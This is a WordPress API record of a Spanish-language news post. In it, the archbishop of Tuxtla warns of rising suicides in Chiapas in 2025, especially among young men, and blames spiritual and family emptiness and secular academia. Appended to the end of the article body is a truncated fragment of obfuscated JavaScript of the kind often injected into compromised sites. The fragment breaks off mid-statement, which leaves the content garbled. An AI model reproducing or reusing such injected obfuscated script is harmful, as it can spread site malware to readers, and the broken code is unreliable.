{"id":24588,"date":"2025-10-17T02:47:41","date_gmt":"2025-10-17T02:47:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24588"},"modified":"2025-10-17T02:47:42","modified_gmt":"2025-10-17T02:47:42","slug":"pide-arzobispo-poner-atencion-al-tema-de-su1cid10s-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24588","title":{"rendered":"Pide arzobispo poner atenci\u00f3n al tema de su1cid10s en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000380440-1-1024x576.jpg\" alt=\"\" class=\"wp-image-24589\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000380440-1-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000380440-1-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000380440-1-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000380440-1-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000380440-1.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<br>16 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Monse\u00f1or Jos\u00e9 Francisco Gonz\u00e1lez Gonz\u00e1lez, arzobispo de Tuxtla alert\u00f3 sobre el preocupante incremento en los casos de suicidio registrados en la entidad durante 2025.<\/p>\n\n\n\n<p>Estos casos particularmente entre j\u00f3venes del sexo masculino, y atribuy\u00f3 esta tendencia a un &#8220;vac\u00edo&#8221; espiritual y familiar promovido por la sociedad occidental.<\/p>\n\n\n\n<p>Expres\u00f3 que: \u201dEl suicidio, por desgracia, es un mal que sigue creciendo en nuestro mundo occidental particularmente. El mundo occidental est\u00e1 generando un tipo de vac\u00edo, que hace que el coraz\u00f3n se sienta hueco y eso hace que se tenga menos deseos de luchar por la vida\u201d.<\/p>\n\n\n\n<p>&#8220;El suicidio trae otro tipo de motivaciones que tambi\u00e9n deben ser atendidas y yo creo que las motivaciones que deben ser atendidas son las espirituales, las familiares&#8221;, asever\u00f3.<\/p>\n\n\n\n<p>Subray\u00f3 que la sensaci\u00f3n de sentirse querido y la plenitud que esto genera son ant\u00eddotos contra la soledad, a la que calific\u00f3 como &#8220;mala consejera&#8221;.<\/p>\n\n\n\n<p>El Arzobispo dirigi\u00f3 una fuerte cr\u00edtica a las instituciones acad\u00e9micas, afirmando que &#8220;lo primero que les quitan a los j\u00f3venes es la fe&#8221; por considerar que no es cient\u00edfica.<\/p>\n\n\n\n<p>Frente a esto, promueven &#8220;formas de tener una espiritualidad media vaga&#8221; que, a su juicio, no responden a los cuestionamientos profundos del ser humano.<\/p>\n\n\n\n<p>En contraste, defendi\u00f3 la fe b\u00edblica como la respuesta que da raz\u00f3n y prop\u00f3sito a la existencia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez.16 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Monse\u00f1or Jos\u00e9 Francisco Gonz\u00e1lez Gonz\u00e1lez, arzobispo de Tuxtla alert\u00f3 sobre el preocupante incremento en los casos de suicidio registrados en la entidad durante 2025. Estos casos particularmente entre j\u00f3venes del sexo masculino, y atribuy\u00f3 esta tendencia a un &#8220;vac\u00edo&#8221; espiritual y familiar promovido por la sociedad occidental. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24589,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24588","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24588","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24588"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24588\/revisions"}],"predecessor-version":[{"id":24590,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24588\/revisions\/24590"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24589"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24588"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24588"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24588"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}